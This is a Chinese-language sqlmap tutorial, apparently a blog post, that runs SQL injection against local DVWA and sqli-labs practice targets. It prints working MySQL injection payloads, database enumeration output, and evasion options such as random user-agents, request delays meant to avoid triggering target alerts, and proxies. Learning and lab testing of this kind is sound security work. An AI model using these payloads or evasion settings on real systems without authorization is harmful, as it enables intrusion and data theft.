[18:06:03] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[18:06:03] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[18:06:03] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[18:06:03] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[18:06:03] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[18:06:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:06:03] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[18:06:03] [INFO] testing 'MySQL inline queries'
[18:06:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[18:06:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[18:06:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[18:06:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[18:06:03] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[18:06:03] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[18:06:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:06:14] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[18:06:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:06:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[18:06:14] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:06:14] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[18:06:14] [INFO] target URL appears to have 2 columns in query
[18:06:14] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[18:06:14] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 145 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 4485=4485#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 4021 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(4021=4021,1))),0x716a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- itaf&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5269 FROM (SELECT(SLEEP(5)))UGkv)-- hSLn&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7170767871,0x77445a5271767a68534a6a4f506b6d7846796151674d745a704549484b614856506754536d726242,0x716a7a6a71),NULL#&Submit=Submit
---
[18:06:28] [INFO] the back-end DBMS is MySQL
[18:06:28] [INFO] fetching banner
[18:06:28] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries)
[18:06:28] [INFO] retrieved: '5.7.26'
[18:06:29] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[18:06:29] [INFO] fetching database names
[18:06:29] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[18:06:29] [WARNING] the SQL query provided does not return any output
[18:06:29] [INFO] retrieved: 'information_schema'
[18:06:29] [INFO] retrieved: 'challenges'
[18:06:29] [INFO] retrieved: 'demo'
[18:06:29] [INFO] retrieved: 'demo1125'
[18:06:29] [INFO] retrieved: 'demo1204'
[18:06:29] [INFO] retrieved: 'dvwa'
[18:06:29] [INFO] retrieved: 'jingdong'
[18:06:29] [INFO] retrieved: 'mysql'
[18:06:29] [INFO] retrieved: 'performance_schema'
[18:06:29] [INFO] retrieved: 'pythontest'
[18:06:29] [INFO] retrieved: 'security'
[18:06:29] [INFO] retrieved: 'sys'
available databases [12]:
[*] challenges
[*] demo
[*] demo1125
[*] demo1204
[*] dvwa
[*] information_schema
[*] jingdong
[*] mysql
[*] performance_schema
[*] pythontest
[*] security
[*] sys

[18:06:29] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 18:06:29 /2020-02-26/


获取当前数据库进行测试:

1
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKX FpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF; PHPSESSID=e0c8pbo1jmiji6fjb5gl5e0nug" --banner --current-db

打印

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.4.2.31#dev}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:08:43 /2020-02-26/

Cookie parameter 'csrftoken' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N]

[18:08:45] [INFO] resuming back-end DBMS 'mysql'
[18:08:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 4485=4485#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 4021 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(4021=4021,1))),0x716a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- itaf&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5269 FROM (SELECT(SLEEP(5)))UGkv)-- hSLn&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7170767871,0x77445a5271767a68534a6a4f506b6d7846796151674d745a704549484b614856506754536d726242,0x716a7a6a71),NULL#&Submit=Submit
---
[18:08:45] [INFO] the back-end DBMS is MySQL
[18:08:45] [INFO] fetching banner
[18:08:45] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries)
[18:08:45] [INFO] resumed: '5.7.26'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[18:08:45] [INFO] fetching current database
[18:08:45] [INFO] retrieved: 'dvwa'
current database: 'dvwa'
[18:08:45] [INFO] fetched data logged to text files under 'xxxx\output\127.0.0.1'

[*] ending @ 18:08:45 /2020-02-26/


可以看出当前的数据库为dvwa。

使用场景二:

想利用cookie值上的SQL注入漏洞。想要检测是否存在cookie注入。
sqlmap使用cookie过程:

  • 登录或浏览页面
  • 找到cookie
  • 在sqlmap中使用–cookie cookie值

进行登录获取cookie演示如下:

网页显示的cookie和开发者工具里的cookie值并不一样,显示的是response的cookie,开发者工具里显示的是request的cookie,测试时使用显示的cookie。
进行测试:

1
python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-20/index.php" --cookie "uname=admin" -- level 2 --banner

打印

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4.2.31#dev}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:41:24 /2020-02-26/

[18:41:24] [INFO] testing connection to the target URL
[18:41:24] [INFO] testing if the target URL content is stable
[18:41:24] [INFO] target URL content is stable
[18:41:24] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1'). You are advised t
o rerun with '--forms'

[*] ending @ 18:41:24 /2020-02-26/


说明:
必须指定level大于等于2时才会显示出cookie注入的信息;
响应头中有Set-Cookie参数时,sqlmap会自动加载Set-Cookie的值进行探测,要想不用这些值,需要加上参数 –drop-set-cookie

三、sqlmap设置请求参数(下)

1.sqlmap中设置user-agent

默认情况下,sqlmap使用以下用户代理执行HTTP请求:

sqlmap/1.0-dev-xxxx(http://sqlmap.org)

sqlmap指定user-agent,使用参数

–user-agent = ‘指定的user-agent’

指定请求头:

1
python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-20/index.php" --cookie "uname=admin" -- level 6 --banner --user-agent="Mozilla/5.0 (Windows NT 10. 0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36"

打印

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:50:43 /2020-02-26/

[18:50:43] [INFO] testing connection to the target URL
[18:50:43] [INFO] testing if the target URL content is stable
[18:50:44] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic no
r injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]

[18:50:45] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1'). You are advised t
o rerun with '--forms'

[*] ending @ 18:50:45 /2020-02-26/


使用随机请求头:

1
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-20/index.php --cookie "uname=admin" --level 2 --banner --random-agent -v 5 --banner

打印

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:58:38 /2020-02-26/

[18:58:38] [DEBUG] cleaning up configuration parameters
[18:58:38] [DEBUG] setting the HTTP timeout
[18:58:38] [DEBUG] setting the HTTP Cookie header
[18:58:38] [DEBUG] setting the HTTP User-Agent header
[18:58:38] [DEBUG] loading random HTTP User-Agent header(s) from file 'E:\SQLMAP\sqlmapproject-sqlmap-0605f14\data\txt\user-agents.txt'
[18:58:38] [INFO] fetched random HTTP User-Agent header value 'Opera/9.50 (Macintosh; Intel Mac OS X; U; en)' from file 'E:\SQLMAP\sqlmapproject-sqlmap-06
05f14\data\txt\user-agents.txt'
[18:58:38] [DEBUG] creating HTTP requests opener object
[18:58:38] [INFO] resuming back-end DBMS 'mysql'
[18:58:38] [INFO] testing connection to the target URL
[18:58:38] [TRAFFIC OUT] HTTP request [#1]:
GET /sqli-labs/Less-20/index.php HTTP/1.1
Cache-control: no-cache
Cookie: uname=admin
User-agent: Opera/9.50 (Macintosh; Intel Mac OS X; U; en)
Host: 127.0.0.1
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

[18:58:38] [DEBUG] declared web page charset 'utf-8'
[18:58:38] [TRAFFIC IN] HTTP response [#1] (200 OK):
Date: Wed, 26 Feb 2020 10:58:38 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://127.0.0.1:80/sqli-labs/Less-20/index.php
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (Cookie)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: uname=admin' AND 1273=1273 AND 'VZnJ'='VZnJ
    Vector: AND [INFERENCE]

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: uname=admin' AND (SELECT 9557 FROM(SELECT COUNT(*),CONCAT(0x71627a7071,(SELECT (ELT(9557=9557,1))),0x71717a7171,FLOOR(RAND(0)*2))x FROM INFOR
MATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Wwka'='Wwka
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.
PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=admin' AND (SELECT 7148 FROM (SELECT(SLEEP(5)))nwhA) AND 'Invp'='Invp
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: uname=-2942' UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7071,0x43464c794b4a465a5649744b6d764e59424342614873544d7759636a62516371494476496653436
2,0x71717a7171)-- -
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY]-- -
---
[18:58:38] [INFO] the back-end DBMS is MySQL
[18:58:38] [INFO] fetching banner
[18:58:38] [DEBUG] resuming configuration option 'string' ('Login')
[18:58:38] [DEBUG] performed 0 queries in 0.00 seconds
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[18:58:38] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 18:58:38 /2020-02-26/

再次进行测试:

1
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-18/index.php --random-agent -v 5 --banner --level 3

显示:

探测的内容明显增多。

2.sqlmap中设置代理

sqlmap中设置代理的参数:

  • –proxy
    设置HTTP代理服务器位置 格式:**–proxy http(s): //ip[端口]**
  • –proxy-cred
    设置HTTP代理服务器认证信息 格式:**–proxy-cred user:pwd**
  • –proxy-file
    设置多条代理在文件中
  • –ignore-proxy
    当希望通过忽略系统范围内的HTTP(S)代理服务器设置来针对本地网络的目标部

最常用的是第一个参数。
–proxy参数测试:

1
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --proxy "http://123.30.238.60:3128" --banner

打印

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
       __H__
 ___ ___[,]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:23:06 /2020-02-26/

[19:23:07] [INFO] resuming back-end DBMS 'mysql'
[19:23:07] [INFO] testing connection to the target URL
[19:23:28] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request(s)
[19:23:28] [WARNING] if the problem persists please check that the provided target URL is reachable. In case that it is, you can try to rerun with switch '--random-agent' and/or proxy switches ('--ignore-proxy', '--proxy',...)
[19:24:31] [CRITICAL] unable to connect to the target URL or proxy

[*] ending @ 19:24:31 /2020-02-26/


```ini
显然代理IP未连接成功。

## 3.sqlmap中设置延迟
参数:
**-\-delay 0**
sqlmap探测过程中会发送大量探测Payload到目标,如果默认情况过快的发包速度会导致目标预警。 为了避免这样的情况发生,可以在探测设置sqlmap发包延迟。
默认情况下,不设置延迟。

进行测试:
```shell
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --delay 10 --banner

打印

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.4.2.31#dev}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:32:51 /2020-02-26/

[19:32:52] [INFO] resuming back-end DBMS 'mysql'
[19:32:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 7360=7360 AND 'lcZO'='lcZO

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=2' AND (SELECT 4240 FROM(SELECT COUNT(*),CONCAT(0x716a787171,(SELECT (ELT(4240=4240,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'DARZ'='DARZ

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 9537 FROM (SELECT(SLEEP(5)))eRXY) AND 'MqRr'='MqRr

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-1033' UNION ALL SELECT NULL,NULL,CONCAT(0x716a787171,0x454766684a4352517a444b547a68524a6f744f4e6f7770796e6446515668715a516c424948495449,0x7176627071)-- -
---
[19:33:02] [INFO] the back-end DBMS is MySQL
[19:33:02] [INFO] fetching banner
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[19:33:02] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 19:33:02 /2020-02-26/


```ini
显然,从19:32:52到19:33:02刚好是10秒,即设置的延迟的时间。

## 4.sqlmap中设置超时
参数:
**-\-timeout 30**

在考虑超时HTTP请求之前,可以指定等待的秒数,有效值是一个浮点数,比如10.5秒。
默认是30秒。

进行测试:
```shell
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --timeout 3.5 --banner

打印

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:38:20 /2020-02-26/

[19:38:20] [INFO] testing connection to the target URL
[19:38:20] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:38:20] [INFO] testing if the target URL content is stable
[19:38:21] [INFO] target URL content is stable
[19:38:21] [INFO] testing if GET parameter 'id' is dynamic
[19:38:21] [INFO] GET parameter 'id' appears to be dynamic
[19:38:21] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[19:38:21] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[19:38:21] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[19:38:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:38:27] [WARNING] reflective value(s) found and filtering out
[19:38:27] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[19:38:27] [INFO] testing 'Generic inline queries'
[19:38:27] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[19:38:27] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[19:38:27] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[19:38:27] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[19:38:27] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[19:38:27] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[19:38:27] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:38:27] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[19:38:27] [INFO] testing 'MySQL inline queries'
[19:38:27] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[19:38:27] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[19:38:28] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[19:38:28] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[19:38:28] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[19:38:28] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[19:38:28] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[19:38:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:38:32] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[19:38:39] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)' injectable
[19:38:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:38:39] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:38:39] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[19:38:39] [INFO] target URL appears to have 3 columns in query
[19:38:40] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 3414=3414 AND 'ixAz'='ixAz

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 3869 FROM(SELECT COUNT(*),CONCAT(0x7171717171,(SELECT (ELT(3869=3869,1))),0x717a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'yUCf'='yUCf

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: id=1' OR (SELECT 9421 FROM (SELECT(SLEEP(5)))QJil) AND 'yspB'='yspB

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-9639' UNION ALL SELECT NULL,NULL,CONCAT(0x7171717171,0x4b5469547561534947737449585a676d4767636475516b6c7a79726c687a54535149694e4f6e7962,0x717a717871)-- -
---
[19:38:43] [INFO] the back-end DBMS is MySQL
[19:38:43] [INFO] fetching banner
[19:38:43] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[19:38:43] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 19:38:43 /2020-02-26/


```ini

## 5.sqlmap中设置超时重试次数
参数:
**-\-retries 3**

设置对应重试次数。
默认情况下重试3次。

关闭apache和mysql服务后进行测试:
```shell
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --timeout 3.5 --retries 5 --banner

打印

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:56:59 /2020-02-26/

[19:57:00] [INFO] testing connection to the target URL
[19:57:02] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[19:57:02] [WARNING] if the problem persists please check that the provided target URL is reachable. In case that it is, you can try to rerun with switch '--random-agent' and/or proxy switches ('--ignore-proxy', '--proxy',...)
[19:57:12] [CRITICAL] unable to connect to the target URL
[19:57:12] [INFO] testing if the target URL content is stable
[19:57:14] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[19:57:24] [CRITICAL] unable to connect to the target URL
[19:57:24] [ERROR] there was an error checking the stability of page because of lack of content. Please check the page request results (and probable errors) by using higher verbosity levels
[19:57:24] [INFO] testing if GET parameter 'id' is dynamic
[19:57:26] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
there seems to be a continuous problem with connection to the target. Are you sure that you want to continue? [y/N]

[19:58:07] [ERROR] user quit

[*] ending @ 19:58:07 /2020-02-26/


```ini
显然,进行了5次尝试.


## 6.sqlmap中设置随机参数
参数:
**-\-randomize 参数名称**

sqlmap可以指定要在每次请求期间随机更改其值的参数名称,长度和类型要和提供的原始值保持一致。

进行测试:
```shell
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --randomize id --banner -v 5

打印

        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4.2.31#dev}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:08:08 /2020-02-26/

[20:08:08] [DEBUG] cleaning up configuration parameters
[20:08:08] [DEBUG] setting the HTTP timeout
[20:08:08] [DEBUG] setting the HTTP User-Agent header
[20:08:08] [DEBUG] creating HTTP requests opener object
[20:08:09] [INFO] resuming back-end DBMS 'mysql'
[20:08:09] [INFO] testing connection to the target URL
[20:08:09] [TRAFFIC OUT] HTTP request [#1]:
GET /sqli-labs/Less-1/?id=7 HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.2.31#dev (http://sqlmap.org)
Host: 127.0.0.1
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

[20:08:09] [DEBUG] declared web page charset 'utf-8'
[20:08:09] [TRAFFIC IN] HTTP response [#1] (200 OK):
Date: Wed, 26 Feb 2020 12:08:09 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://127.0.0.1:80/sqli-labs/Less-1/?id=7
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 6613=6613 AND 'wyLD'='wyLD
    Vector: AND [INFERENCE]

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
